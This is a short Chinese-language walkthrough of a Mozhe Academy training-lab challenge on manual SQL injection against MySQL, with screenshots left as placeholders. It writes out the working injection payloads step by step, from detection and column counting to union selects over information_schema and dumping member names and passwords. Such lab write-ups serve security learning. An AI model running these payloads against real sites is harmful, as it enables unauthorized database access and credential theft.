墨者学院-SQL手工注入漏洞测试(MySQL数据库)

image.png

思路：
1.判断是否存在注入点。使用and、or、’，判断是否有注入，是否存在宽字节注入.是否存在http头注入以及工具检测等。
2.构造闭合。查询查询字段数，字段位置，利用mysql的特性，information_schema中，tables表存在着数据库名字对应表名，columns表存在表名对应列名，获取相关数据，information_schema.tables 的table_name,information_schema.columns的clumn_name。

验证：

• 判断是否存在注入点。加'页面报错。and 1=1 和 and 1=2，页面发生变化。存在注入点。

  
  
  

  image.png
  
  
  

  image.png
  
  
  

  image.png
• 判断字段。order by 5页面报错。order by 4 页面正常。
  
  

  image.png
  
  
  

  image.png

• 判断位置。union select 1，2，3，4

  
  
  

  image.png

• 判断数据库的名字和用户名字。union select 1,database(),user(),4

  
  
  

  image.png

• 判断表名。union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()

  
  
  

  image.png
  
  

  *判断列名。union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'

  
  
  

  image.png

• 获取字段 union select 1，group_concat(name),group_concat(password),4 from StormGroup_member

  
  
  

  image.png

• 风雨过后就是彩虹。